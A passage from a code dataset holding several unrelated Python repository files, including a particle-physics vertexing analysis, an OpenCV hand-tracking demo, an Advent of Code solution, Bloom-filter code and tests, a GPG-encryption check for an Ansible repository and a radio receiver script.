the Bs vertex)\n .Define(\"n_BsTracks\", \"ReconstructedParticle2Track::getTK_n( BsTracks )\")\n\n # Now we reconstruct the Bs decay vertex using the reco'ed tracks.\n # First the full object, of type Vertexing::FCCAnalysesVertex\n .Define(\"BsVertexObject\", \"VertexFitterSimple::VertexFitter_Tk( 2, BsTracks)\" )\n # from which we extract the edm4hep::VertexData object, which contains the vertex positiob in mm\n .Define(\"BsVertex\", \"VertexingUtils::get_VertexData( BsVertexObject )\")\n\n\n\t # We may want to look at the reco'ed Bs legs: in the BsRecoParticles vector, \n # the first particle (vector[0]) is the mu+, etc :\n .Define(\"RecoMuplus\", \"selRP_leg(0)( BsRecoParticles )\")\n .Define(\"RecoMuminus\", \"selRP_leg(1)( BsRecoParticles )\")\n .Define(\"RecoKplus\", \"selRP_leg(2)( BsRecoParticles )\")\n .Define(\"RecoKminus\", \"selRP_leg(3)( BsRecoParticles )\")\n # and their kinematics :\n .Define(\"RecoMuplus_theta\", \"ReconstructedParticle::get_theta( RecoMuplus )\")\n .Define(\"RecoMuplus_phi\", \"ReconstructedParticle::get_phi( RecoMuplus )\")\n .Define(\"RecoMuplus_e\", \"ReconstructedParticle::get_e( RecoMuplus )\")\n .Define(\"RecoMuminus_theta\", \"ReconstructedParticle::get_theta( RecoMuminus )\")\n .Define(\"RecoMuminus_phi\", \"ReconstructedParticle::get_phi( RecoMuminus )\")\n .Define(\"RecoMuminus_e\", \"ReconstructedParticle::get_e( RecoMuminus )\")\n .Define(\"RecoKplus_theta\", \"ReconstructedParticle::get_theta( RecoKplus )\")\n .Define(\"RecoKplus_phi\", \"ReconstructedParticle::get_phi( RecoKplus )\")\n .Define(\"RecoKplus_e\", \"ReconstructedParticle::get_e( RecoKplus )\")\n .Define(\"RecoKminus_theta\", \"ReconstructedParticle::get_theta( RecoKminus )\")\n .Define(\"RecoKminus_phi\", \"ReconstructedParticle::get_phi( RecoKminus )\")\n .Define(\"RecoKminus_e\", \"ReconstructedParticle::get_e( RecoKminus )\")\n\n\t # Looks at the angular separation (3D angles) between the Bs daughters: among\n # all the pairs of particles in BsRecoParticles, retrieve the minimal angular distance,\n # the maximal distance, and the average distance\n .Define(\"deltaAlpha_max\",\"ReconstructedParticle::angular_separationBuilder(0)( BsRecoParticles )\")\n .Define(\"deltaAlpha_min\",\"ReconstructedParticle::angular_separationBuilder(1)( BsRecoParticles )\")\n .Define(\"deltaAlpha_ave\",\"ReconstructedParticle::angular_separationBuilder(2)( BsRecoParticles )\")\n\n\t # To look at the angular separation between the MC Jpsi and the Phi :\n\n\t # First retrieve the indices of the JPsi and the phi :\n # MC indices of the decay Bs (PDG = 531) -> JPsi (PDG = 443) Phi (PDG = 333)\n # Retrieves a vector of int's which correspond to indices in the Particle block\n # vector[0] = the mother, and then the daughters in the order specified, i.e. here\n # [1] = the Jpsi, [2] = the phi\n # The first boolean below (here set to false) means that we look for a JPsi and a Phi\n # among the direct daughters of the mother, i.e. the decay tree is not explored down\n # to the final, stable particles.\n # The second boolean (true) means that the charge conjugate decay isincluded too.\n # If the event contains more than one such decays,only the first one is kept.\n # get_indices_ExclusiveDecay looks for an exclusive decay: if a mother is found, that decays \n # into the particles specified in the list plus other particle(s), this decay is not selected.\n .Define(\"Bs2JPsiPhi_indices\", \"MCParticle::get_indices_ExclusiveDecay( 531, {443,333}, false, true) ( Particle, Particle1)\" )\n\n # This extracts the MC Jpsi. In list of indices determined above, Bs2JPsiPhi_indices,\n # 1 is the position of the Jpsi in the Bs2JPsiPhi_indices vector.\n .Define(\"JPsi\", \"selMC_leg( 1) ( Bs2JPsiPhi_indices , Particle )\")\n # Idem: extract the MC Phi. 2 is the position of the Phi in the Bs2JPsiPhi_indices vector.\n .Define(\"Phi\", \"selMC_leg( 2) ( Bs2JPsiPhi_indices , Particle )\")\n\n # From these two MC particles, determine their angular separation\n .Define(\"Angle_JpsiPhi\", \"MCParticle::AngleBetweenTwoMCParticles( JPsi, Phi)\" )\n\n\n\n # the reco'ed legs, with the momenta at the Bs decay vertex - instead of at their\n\t # point of dca\n .Define(\"RecoMuplus_atVertex\", \"selRP_leg_atVertex(0) ( BsRecoParticles, BsVertexObject, EFlowTrack_1 )\")\n .Define(\"RecoMuplus_atVertex_theta\", \"ReconstructedParticle::get_theta( RecoMuplus_atVertex )\")\n .Define(\"RecoMuplus_atVertex_phi\", \"ReconstructedParticle::get_phi( RecoMuplus_atVertex )\")\n .Define(\"RecoMuminus_atVertex\", \"selRP_leg_atVertex(1) ( BsRecoParticles, BsVertexObject, EFlowTrack_1 )\")\n .Define(\"RecoMuminus_atVertex_theta\", \"ReconstructedParticle::get_theta( RecoMuminus_atVertex )\")\n .Define(\"RecoMuminus_atVertex_phi\", \"ReconstructedParticle::get_phi( RecoMuminus_atVertex )\")\n .Define(\"RecoKplus_atVertex\", \"selRP_leg_atVertex(2) ( BsRecoParticles, BsVertexObject, EFlowTrack_1 )\")\n .Define(\"RecoKplus_atVertex_theta\", \"ReconstructedParticle::get_theta( RecoKplus_atVertex )\")\n .Define(\"RecoKplus_atVertex_phi\", \"ReconstructedParticle::get_phi( RecoKplus_atVertex )\")\n .Define(\"RecoKminus_atVertex\", \"selRP_leg_atVertex(3) ( BsRecoParticles, BsVertexObject, EFlowTrack_1 )\")\n .Define(\"RecoKminus_atVertex_theta\", \"ReconstructedParticle::get_theta( RecoKminus_atVertex )\")\n .Define(\"RecoKminus_atVertex_phi\", \"ReconstructedParticle::get_phi( RecoKminus_atVertex )\")\n\n # not so useful here, but for completeness : Bs to JPsi decay ?\n # Returns booleans. e.g. the first one means that the event contains a Bs that decayed to a JPsi (443) + X, \n # not counting the cases where Bs -> Bsbar -> JPsi + X\n .Define(\"Bsdecay\", \"MCParticle::get_decay(531, 443, false)(Particle, Particle1)\")\n .Define(\"Bsbardecay\", \"MCParticle::get_decay(-531, 443, false)(Particle, Particle1)\")\n\n\t # to get the distribution of the d0 of the mu+ track\n\t .Define(\"RecoMuplus_d0\", \"ReconstructedParticle2Track::getRP2TRK_D0( RecoMuplus, EFlowTrack_1) \")\n\t .Define(\"RecoMuplus_z0\", \"ReconstructedParticle2Track::getRP2TRK_Z0( RecoMuplus, EFlowTrack_1) \")\n\n\n )\n\n\n # select branches for output file\n branchList = ROOT.vector('string')()\n for branchName in [\n \"MC_PrimaryVertex\",\n \"ntracks\",\n #\"Bs2JPsiPhi_indices\",\n #\"Bs2MuMuKK_indices\",\n #\"Muplus\",\n #\"Muminus\",\n #\"Kplus\",\n #\"Kminus\",\n\n\t # Kinematics of the MC particles:\n \"Muplus_theta\",\n \"Muplus_phi\",\n \"Muplus_e\",\n \"Muminus_theta\",\n \"Muminus_phi\",\n \"Muminus_e\",\n \"Kplus_theta\",\n \"Kplus_phi\",\n \"Kplus_e\",\n \"Kminus_theta\",\n \"Kminus_phi\",\n \"Kminus_e\",\n \"Bs_theta\",\n \"Bs_phi\",\n \"Bs_e\",\n\n \"Bsdecay\",\n \"Bsbardecay\",\n\n # MC Bs decay vertex :\n \"BsMCDecayVertex\",\n\t\t# Reco'ed Bs vertex :\n \"BsVertex\",\n #\"BsTracks\",\n \"n_BsTracks\",\n\n \"deltaAlpha_max\",\n \"deltaAlpha_min\",\n \"deltaAlpha_ave\",\n #\"BsRecoParticles\",\n\n\t # Kinematics of the Reco'ed particles:\n \"RecoMuplus_theta\",\n \"RecoMuplus_phi\",\n \"RecoMuplus_e\",\n \"RecoMuminus_theta\",\n \"RecoMuminus_phi\",\n \"RecoMuminus_e\",\n \"RecoKplus_theta\",\n \"RecoKplus_phi\",\n \"RecoKplus_e\",\n \"RecoKminus_theta\",\n \"RecoKminus_phi\",\n \"RecoKminus_e\",\n\n \"RecoMuplus_atVertex_theta\",\n \"RecoMuplus_atVertex_phi\",\n \"RecoMuminus_atVertex_theta\",\n \"RecoMuminus_atVertex_phi\",\n \"RecoKplus_atVertex_theta\",\n \"RecoKplus_atVertex_phi\",\n \"RecoKminus_atVertex_theta\",\n \"RecoKminus_atVertex_phi\",\n\n \"Angle_JpsiPhi\",\n\n\t\t\"RecoMuplus_d0\",\n\t\t\"RecoMuplus_z0\"\n\n\n ]:\n branchList.push_back(branchName)\n df2.Snapshot(\"events\", self.outname, branchList)\n\n\n\nif __name__ == \"__main__\":\n\n if len(sys.argv)==1:\n print (\"usage:\")\n print (\"python \",sys.argv[0],\" file.root\")\n sys.exit(3)\n infile = sys.argv[1]\n #outDir = 'FCCee/'+sys.argv[0].split('/')[1]+'/'\n outDir = './'\n import os\n os.system(\"mkdir -p {}\".format(outDir))\n outfile = outDir+infile.split('/')[-1]\n ncpus = 0\n analysis = analysis(infile, outfile, ncpus)\n analysis.run()\n\n tf = ROOT.TFile(infile)\n entries = tf.events.GetEntries()\n p = ROOT.TParameter(int)( \"eventsProcessed\", entries)\n outf=ROOT.TFile(outfile,\"UPDATE\")\n p.Write()\n","repo_name":"HEP-FCC/FCCeePhysicsPerformance","sub_path":"case-studies/flavour/VertexExamples/analysis_Bs2JPsiPhi.py","file_name":"analysis_Bs2JPsiPhi.py","file_ext":"py","file_size_in_byte":16612,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"741921927","text":"import cv2\nfrom cvzone.HandTrackingModule import HandDetector\n\n\ncap = cv2.VideoCapture(0)\ncap.set(3, 1280)\ncap.set(4, 720)\ndetector = HandDetector(detectionCon=0.8, maxHands=4)\n\ncolorR = (255, 255, 255) # 方框原始颜色\ncx, cy = 100, 100 # 方框原始的中心位置qq\nw, h = 200, 200 # 方框的宽(weight)、高(height)\n\nwhile True:\n colorR = (255, 255, 255)\n\n success, img = cap.read()\n img = cv2.flip(img, 1) # 0-垂直翻转,1-水平翻转\n hands, img = detector.findHands(img, flipType=False)\n\n if hands:\n\n lmList = hands[0]['lmList']\n\n distance, _, _ = detector.findDistance(lmList[8], lmList[12], img) # 食指和中指间的距离\n\n cursor = lmList[8] # 食指的位置信息\n if distance < 90:\n if cx - w // 2 < cursor[0] < cx + w // 2 and cy - h // 2 < cursor[1] < cy + h // 2:\n colorR = (0, 255, 0)\n cx, cy = cursor\n\n # 图像框\n cv2.rectangle(img, (cx - w // 2, cy - h // 2), (cx + w // 2, cy + h // 2),\n color=colorR, thickness=cv2.FILLED)\n\n cv2.imshow('Image', img)\n cv2.waitKey(1)\n\n if cv2.waitKey(5) & 0xFF == ord('q'):\n break\n","repo_name":"dengfa02/CV_rookie","sub_path":"virtual_move.py","file_name":"virtual_move.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12931597817","text":"with open ('Day3/day_3') as f:\r\n data = f.read().splitlines()\r\n\r\n# Part 1\r\n\r\ncommon_values = [0,0,0,0,0,0,0,0,0,0,0,0]\r\nfor number in data:\r\n for i, bit in enumerate(number):\r\n common_values[i] += int(bit)\r\n\r\ngamma_rate = [\"1\" if (c > len(data)//2) else \"0\" for c in common_values ]\r\nepsilon_rate = []\r\nfor b in gamma_rate:\r\n epsilon_rate.append( \"1\" if b == \"0\" else \"0\" )\r\n\r\ngamma_rate = int(\"\".join(gamma_rate), 2)\r\nepsilon_rate = int(\"\".join(epsilon_rate), 2)\r\nprint(gamma_rate ,epsilon_rate, gamma_rate * epsilon_rate)\r\n\r\n# Part 2\r\n\r\ndef find_rating(data, pos = 0, bit_criteria = \"1\"):\r\n if len(data) == 1:\r\n return data[0]\r\n\r\n common_values = [0,0,0,0,0,0,0,0,0,0,0,0]\r\n for number in data:\r\n for i, bit in enumerate(number):\r\n common_values[i] += int(bit)\r\n\r\n if bit_criteria == \"1\":\r\n most_common = [1 if (c >= len(data)/2) else 0 for c in common_values]\r\n if bit_criteria == \"0\":\r\n most_common = [0 if (c >= len(data)/2) else 1 for c in common_values]\r\n\r\n new_list = []\r\n for v in data:\r\n if int(v[pos]) == most_common[pos]:\r\n new_list.append(v)\r\n\r\n return find_rating(new_list, pos + 1, bit_criteria)\r\n\r\noxygen_generator_rating = int(find_rating(data, 0, \"1\"), 2)\r\nCO2_scrubber_rating = int(find_rating(data, 0, \"0\"), 2)\r\n\r\nprint(oxygen_generator_rating, CO2_scrubber_rating, oxygen_generator_rating * CO2_scrubber_rating)","repo_name":"Wolfy7/AdventOfCode2021","sub_path":"Day3/day_3.py","file_name":"day_3.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28183663720","text":"from game.gui_components.objects.game_object import Game_Object\nimport random\nfrom constants import(\n SCREEN_WIDTH,\n SCREEN_HEIGHT\n)\nclass Fog(Game_Object):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.image = \"FogT4\"\n self.rotation = 90 * random.randint(0,3)\n\n def draw(self, centered_object):\n\n x = self.x - centered_object.x + SCREEN_WIDTH/ 2\n y = self.y - centered_object.y + SCREEN_HEIGHT/ 2\n self.sprite.draw(x, y)\n ","repo_name":"dsjensen19/Final-Project","sub_path":"game/gui_components/objects/fog.py","file_name":"fog.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27962341276","text":"from math import log\n\n\ndef get_bloom_filters_parameters(rdd, false_positive_ratio):\n \"\"\"\n Given a rdd of films and ratings return a dictionary of parameters n, m ,k for every rating.\n Input: rdd of filmId, rating.\n Output: Dictionary of {rating: [n, m, k]} sorted for rating.\n \"\"\"\n rdd = rdd.map(lambda x: [round(float(x[1])), x[0]]) # map the rdd in the form (rating, film)\n rdd = rdd.map(lambda x: (x[0], 1))\n rdd = rdd.reduceByKey(lambda x, y: x+y)\n rdd = rdd.map(lambda x: get_parameters(x, false_positive_ratio)) # map parameters to every rating\n rdd = rdd.sortByKey() # sort ratings\n rdd.saveAsTextFile(f\"./Data/Output/Parameters\")\n bloom_parameters = rdd.collect()\n bloom_parameters = {parameter[0]: parameter[1] for parameter in bloom_parameters} # transform the list of lists\n # in a dictionary\n return bloom_parameters\n\n\ndef get_parameters(x, false_positive_ratio):\n \"\"\"\n Return parameters n,m and k for the Bloom filter construction.\n Input: (rating, list[filmId])\n Output: (rating, [n, m, k])\n \"\"\"\n n = x[1]\n m = round(-((n * log(false_positive_ratio)) / (log(2)) ** 2))\n k = round((m / n) * log(2))\n return x[0], [n, m, k]\n\n","repo_name":"EhiSuper/BloomFilterInSpark","sub_path":"src/BloomFiltersParameters.py","file_name":"BloomFiltersParameters.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6266584811","text":"from re import compile\nfrom chars import *\n\nKEYWORDS = set('''\n if elif else\n from import as\n for in while\n True False None\n try except finally\n async def = := lambda del\n await return yield raise\n + - * ** / % @ & | ^\n += -= *= **= /= %= @= &= |= ^=\n == > < is\n != <= >=\n and or not\n ( ) [ ] { } : . ,\n'''.strip().split())\n\ndef _fullmatch(regex):\n return compile(regex).fullmatch\n\ndecimal = _fullmatch('[+-]?(0|[1-9](_?[0-9])*)(\\.([0-9](_?[0-9])*)?)?(e[0-9](_?[0-9])*)?')\noctal = _fullmatch('[+-]?0o[_0-7]+')\noctal = _fullmatch('[+-]?0x[_0-9a-fA-F]+')\nbinary = _fullmatch('[+-]?0b[_01]+')\nident = _fullmatch('[_a-zA-Z][_a-zA-Z0-9]*')\n\ndef number(w):\n return decimal(w) or octal(w) or binary(w)\n\ndef quoted(w) -> 'end_quote' or None:\n if w[0] in QUOTE_CHARS:\n return w[0]\n if len(w) > 1 and w[0] in ('f', 'r') and w[1] in QUOTE_CHARS:\n return w[1]\n\ndef balanced_braces(w):\n imbalance = 0\n found = False\n for c in w:\n if c == '{':\n imbalance += 1\n elif c == '}':\n imbalance -= 1\n found = True\n return found and not imbalance\n","repo_name":"qguv/pysh","sub_path":"patterns.py","file_name":"patterns.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"10377507308","text":"#: 1일 될때까지 예제의 시간복잡도, 공간 복잡도를 분석한다.\nimport time\nimport os \nimport psutil \nprocess=psutil.Process(os.getpid())\nstart_time=time.time()\n\n\n#n,k=map(int,input('두 수를 공백으로 분리하여 입력하시오>').split()) # N, K을 공백을 기준으로 구분하여 입력 받기\nn=25\nk=4\nresult = 0\nwhile True: # 반복 루프 시작\n target =(n//k)*k \n# K로 나누어 지는 수를 구함, 예) 25 나누기 4 곱하기 4 = 처음 24\n result += (n - target) # N이 K로 나누어 떨어지는 수가 될 때까지 빼기, 1\n n = target # 25를 24로 수정\n if n < k: # N이 K보다 작을 때 (더 이상 나눌 수 없을 때) 반복문 탈출\n break\n result += 1 # 횟수 증가\n n //= k # K로 나누기, n = 6\nresult += (n - 1) # 마지막으로 남은 수에 대하여 1씩 빼기, 6, 5 --> 4일때까지 2번 추가 빼기, 마지막 1번 나누고\nprint(\"1이 도달하기 까지 연산 횟수 :\", result) # 총 5번 횟수 연산\n\n\nend_time=time.time() \nprint(\"time:\",format(end_time-start_time,'.10f'))\nprint('MB bytes:',process.memory_info().rss/(1024.0*1024.0))\n","repo_name":"heosujinnn/py_algorithm","sub_path":"DAY3/1_PLEASE_EX1.py","file_name":"1_PLEASE_EX1.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35335682385","text":"#!/usr/bin/env python3\n'''\nTest Module which Checks if all files that are pushed to gitlab\nare encrypted the right way\n'''\nimport os\nimport unittest\nimport re\nimport gnupg\nimport yaml\nfrom pprint import PrettyPrinter\nfrom multivault.utilities import util_crypt\nfrom multivault.base import config\nfrom multivault.utilities import util_ldap\n\n\nTESTING_FILE = 'multivault-gitlabtest.yml'\nANSIBLE = None\nDIR_PATH = os.path.dirname(os.path.realpath(__file__))\nROOT_PATH = os.path.join(DIR_PATH, \"..\", \"..\")\nCONF_PATH = os.path.join(DIR_PATH, TESTING_FILE)\nconfig.init(conf_path=CONF_PATH)\nANSIBLE_PATH = os.path.join(DIR_PATH, \"..\", \"..\", \"all.yml\")\nINVENTORY_PATH = os.path.join(DIR_PATH, \"..\", \"..\", \"inventory.ini\")\nKEY_PATH = os.path.join(DIR_PATH, \"..\", \"..\", \"temp\", \"keys\")\nGNUPG_PATH = os.path.join(DIR_PATH, \"..\", \"..\", \"temp\", \"keyring\")\nGNUPG = gnupg.GPG(gnupghome=GNUPG_PATH)\nwith open(ANSIBLE_PATH, \"r\") as ANSIBLE_PT:\n ANSIBLE = yaml.load(ANSIBLE_PT)\nPATTERN = re.compile(\n r'^(?Proles/(?P.*?)/gpg/(?P.*?\\.gpg))$', re.MULTILINE)\nPATTERN2 = re.compile(r'^\\s*(.*?)\\.server\\.selfnet\\.de$', re.MULTILINE)\nPATTERN3 = re.compile(r'^:pubkey.*?keyid (.*?)$', re.MULTILINE)\n\n#config.LDAP_SSH_HOP = 'login'\n\n\nclass TestChangedFiles(unittest.TestCase):\n '''\n Test Class for the gpg check\n '''\n\n def test_changed_files(self):\n '''\n Gets the Information from the changed file and from ldap and the gpg repo\n Validates if a file is encrypted for the right users\n '''\n config.init(conf_path=CONF_PATH)\n util_crypt.update_git_repo(config.GPG_REPO, path=KEY_PATH)\n files = construct_gpg_information(\"master\")\n printer = PrettyPrinter(indent=2)\n for file_info in files:\n print(file_info['filename'])\n print(\n \"+--- Encrypted for {}:\".format(file_info['encrypted_for']))\n users = extract_subkey_for_every_user(file_info['users'])\n if users:\n for user, data in users.items():\n for key in data.keys():\n if key in file_info['encrypted_for']:\n users[user][key]['encrypted_for'] = True\n else:\n pass\n printer.pprint(users)\n for user, data in users.items():\n if user == 'tobiass' or user == 'sebastiann' or user == 'jo':\n self.assertFalse(check_encrypted_for_user(data))\n else:\n self.assertTrue(check_encrypted_for_user(data))\n else:\n pass\n\n\ndef check_encrypted_for_user(key_data):\n '''\n checks for an encryption with one key of an user:\n '''\n for key in key_data.keys():\n if key_data[key]['encrypted_for']:\n return True\n else:\n pass\n return False\n\n\ndef extract_subkey_for_every_user(key_information):\n '''\n Extracts the information out of the\n gnupg.GPG.scan_keys() inside of the file_info object\n '''\n subkeys = {}\n if not key_information:\n return None\n for user, data in key_information.items():\n subkeys[user] = {}\n if data:\n data = data[0]\n for subkey, expire_date in data['subkeys']:\n subkeys[user][subkey] = {}\n subkeys[user][subkey]['expire_date'] = expire_date\n subkeys[user][subkey]['encrypted_for'] = False\n else:\n data = None\n return subkeys\n\n\ndef get_hosts(group_name):\n '''\n Get the hosts out of the\n ansible inventori.ini file\n '''\n return extract_hosts(\n util_crypt.run_cmd(\n [\"ansible\",\n group_name,\n \"-i\",\n INVENTORY_PATH,\n \"--list-hosts\"]))\n\n\ndef get_file_info(file_path):\n '''\n extracts the information out of the gpg file\n given py\n @param file_path\n '''\n return extract_keys(util_crypt.run_cmd([\"gpg\", \"--list-packets\", \"--list-only\", file_path]))\n\n\ndef changed_files(base, ahead):\n '''\n returns all files that differ from base branch\n @param base the base branch\n @param ahead the actual branch\n @return list_of_files by function @method extract()\n '''\n return extract(util_crypt.run_cmd([\"git\", \"diff\", \"--name-only\", base, ahead, \"--\"]))\n\n\ndef all_files(branch):\n '''\n returns all files tracked inside the given branch\n @param branch the branch to list the files of\n @return list_of_all_files @method extract()\n '''\n return extract(util_crypt.run_cmd([\"git\", \"ls-tree\", \"-r\", \"--name-only\", branch]))\n\n\ndef extract(output):\n '''\n Uses regex to extract files from cli\n should be used only in a method _files\n @param output output of @method all_files or @method changed_files\n @return list_of_extracted_files\n '''\n return [m.groupdict() for m in PATTERN.finditer(output)]\n\n\ndef extract_hosts(output):\n '''\n extracts the hosts from cli output of @method get_hosts(...)\n @param output of a subprocess call\n @return list_of_matching_hostnames\n '''\n if '[WARNING]:' in output:\n return None\n return PATTERN2.findall(output)\n\n\ndef extract_keys(output):\n '''\n extract the keys from the cli output of @method get_file_info()\n @param output output of cli\n @return list_of_keys_encrypted_for\n '''\n return PATTERN3.findall(output)\n\n\ndef construct_file_host_role_mapping(files):\n '''\n Reads the all.yml file from ansible and\n substitutes the groups to hostname_lists\n @param files gpg files with extracted role\n @return dict dict with files and their hostnames\n '''\n for playbook in ANSIBLE[1:]:\n hosts = playbook['hosts']\n roles = playbook['roles']\n for fil in files:\n if fil['role'] in roles:\n fil['hosts'] = get_hosts(hosts)\n return files\n\n\ndef construct_gpg_information(base, ahead=\"HEAD\", whole=False):\n '''\n Merges all methods from above to an big\n dictionary\n @param base base branch\n @param ahead actual branch defaults to current HEAD of branch\n @param whole if set to true the whole indexed files are checked\n @return files_and_hosts big dictionary with much information about the files\n '''\n if whole:\n changed = all_files(base)\n else:\n if not ahead:\n return None\n changed = changed_files(base, ahead)\n files_and_hosts = construct_file_host_role_mapping(changed)\n for file_meta in files_and_hosts:\n if 'hosts' in file_meta:\n users = util_ldap.get_authorized(file_meta['hosts'])\n else:\n users = None\n file_meta['path'] = file_meta['path'].split('/')\n path = ROOT_PATH\n for part in file_meta['path']:\n path = os.path.join(path, part)\n file_meta['encrypted_for'] = get_file_info(path)\n gpg_mapping = {}\n if users:\n for user,_ in users:\n gpg_key_file = os.path.join(KEY_PATH, user + \".gpg\")\n if os.path.exists(gpg_key_file):\n gpg_mapping[user] = GNUPG.scan_keys(gpg_key_file)\n else:\n gpg_mapping[user] = None\n file_meta['users'] = gpg_mapping\n else:\n file_meta['users'] = None\n return files_and_hosts\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Selfnet/multivault","sub_path":"tests/test_role_changes.py","file_name":"test_role_changes.py","file_ext":"py","file_size_in_byte":7560,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"35635639052","text":"#!/usr/bin/python\n\nimport time\nimport RPi.GPIO as GPIO \nfrom RFM69 import Radio, FREQ_433MHZ\n\nfrequency = 434000000 \nmyEncryptionKey = \"cansxINDA\"\nnumber = 0\n\nprint (\"Starting reception program\")\n\ntry:\n with Radio(FREQ_433MHZ, nodeID=2, networkID=100, isHighPower=True, verbose=False, interruptPin=18, resetPin=22, spiDevice=0, autoAcknowledge=False, encryptionKey=myEncryptionKey) as radio, open('database.csv', 'a+') as output:\n print (\"Starting receiving data...\")\n \n radio.calibrate_radio()\n radio.set_power_level(100)\n radio.set_frequency_in_Hz(frequency)\n \n while True:\n number += 1\n \n packet = radio.get_packet(timeout=1)\n \n if packet is not None:\n datas = packet.to_dict()\n print(\"Message %s, RSSI %s= %s\" % (str(number), datas['rssi'], packet.data_string))\n print(\"%s,%s,%s\" % (str(number), datas['rssi'], packet.data_string), file=output)\nfinally:\n GPIO.cleanup()\n","repo_name":"leopard3l/cansx","sub_path":"receive_data.py","file_name":"receive_data.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26525305679","text":"# http://hamukazu.com/2014/09/26/scipy-sparse-basics/\nfrom scipy.sparse import lil_matrix, csr_matrix\n\n# 疎行列aを用意する(3x3のすべて0の行列)\n# return \n# a = lil_matrix([3, 3])\na = lil_matrix((3, 3)) # 引数がlistだと値をセットしたときエラーが出る、tupleを渡す\n\n# 非ゼロ要素を設定する\na[0, 0]=1;a[0, 2]=2\n\n# lil_matrixをcsr_matrixに変換する\n# return \na = a.tocsr()\n\n# 疎行列bを用意する\nb = lil_matrix((3, 3))\n\n# 非ゼロようそを追加する\nb[1, 1] = 3; b[2, 0] = 4; b[2, 2] = 5\n\n# lil_matrixをcsr_matrixに変換する\nb = b.tocsr()\n\n# aとbの積を計算する\n# なぜdotか?https://qiita.com/masafumi_miya/items/640800cef813acf70caf\nc = a.dot(b)\n\n# # aとbの和を計算する\nd = a + b\n\nprint(d.toarray())\n# toarrayでvisualize できる, cast できる\n# return \n# print(c.toarray())\n","repo_name":"urasin/count_vectorizer","sub_path":"study_sparse_matrix.py","file_name":"study_sparse_matrix.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37861597912","text":"from unittest import TestCase\nfrom functools import reduce\nfrom math import exp, ceil\nfrom bloomfilter import union, intersection, element, optimal_hash_runs, optimal_filter_bits, len as bf_len\nfrom bloomfilter import _DEFAULT_HASH_RUNS, _DEFAULT_FILTER_BITS\n\n\nclass TestUtils(TestCase):\n def test_optimal_hash_runs(self):\n self.assertEqual(optimal_hash_runs(2000, 16384), 6)\n self.assertEqual(optimal_hash_runs(200, 4096), 14)\n self.assertEqual(optimal_hash_runs(32, 8096), 175)\n\n def test_optimal_filter_bits(self):\n self.assertEqual(optimal_filter_bits(1000, 0.01), 9586)\n self.assertEqual(optimal_filter_bits(100, 0.01), 959)\n\n\nclass TestBloomFilter(TestCase):\n def test_element_is_deterministic(self):\n e1 = element(b\"element\")\n e2 = element(b\"element\")\n\n self.assertEqual(e1, e2)\n\n def test_element_is_int(self):\n e = element(b\"element\")\n\n self.assertTrue(type(e) is int)\n\n def test_intersection_duplicates(self):\n e1 = element(b\"element 1\")\n\n self.assertEqual(intersection(e1, e1),\n e1)\n\n def test_intersection_unions(self):\n e1 = element(b\"element 1\")\n e2 = element(b\"element 2\")\n e3 = element(b\"element 3\")\n\n self.assertEqual(intersection(union(e1, e2, e3),\n union(e1, e2)),\n union(e1, e2))\n\n def test_union_nests(self):\n e1 = element(b\"element 1\")\n e2 = element(b\"element 2\")\n e3 = element(b\"element 3\")\n\n self.assertEqual(union(e1, e2, e3),\n union(e1,\n union(e2, e3)))\n\n def test_false_positive_rate(self, item_count=1000, bloom_size=_DEFAULT_FILTER_BITS, bloom_hashes=_DEFAULT_HASH_RUNS):\n bloom = reduce(union,\n map(lambda c: element(c.to_bytes(c.bit_length(), byteorder='big'),\n bloom_size,\n bloom_hashes),\n range(item_count)))\n false_positive_probability = pow(1 - exp(-bloom_hashes / (bloom_size / item_count)), bloom_hashes)\n\n false_positives = 0\n for c in range(item_count * 2):\n new_c = c + item_count\n e = element(new_c.to_bytes(new_c.bit_length(), byteorder='big'),\n bloom_size,\n bloom_hashes)\n if intersection(bloom, e) == e:\n false_positives += 1\n false_positive_ratio = false_positives / (item_count * 2)\n max_deviation = false_positive_probability * 0.075\n self.assertAlmostEqual(false_positive_ratio, false_positive_probability, delta=max_deviation)\n\n def test_false_positive_rate_at_different_settings(self):\n for test_args in (dict(item_count=3000, bloom_size=_DEFAULT_FILTER_BITS * 2, bloom_hashes=_DEFAULT_HASH_RUNS // 2),\n dict(item_count=300, bloom_size=_DEFAULT_FILTER_BITS // 2, bloom_hashes=_DEFAULT_HASH_RUNS * 2),\n dict(item_count=1100, bloom_size=_DEFAULT_FILTER_BITS * 2, bloom_hashes=_DEFAULT_HASH_RUNS * 2),\n dict(item_count=1000, bloom_size=_DEFAULT_FILTER_BITS, bloom_hashes=optimal_hash_runs(2000, _DEFAULT_FILTER_BITS))\n ):\n with self.subTest(**test_args):\n self.test_false_positive_rate(**test_args)\n\n def test_len(self):\n bloom = 0b0\n for c in range(1, 1001):\n bloom = union(bloom, element(b\"element \" + str(c).encode()))\n with self.subTest(c=c):\n self.assertAlmostEqual(bf_len(bloom), c, delta=ceil(c * 0.025))\n","repo_name":"tommyvn/bloomfilter","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17283918284","text":"import 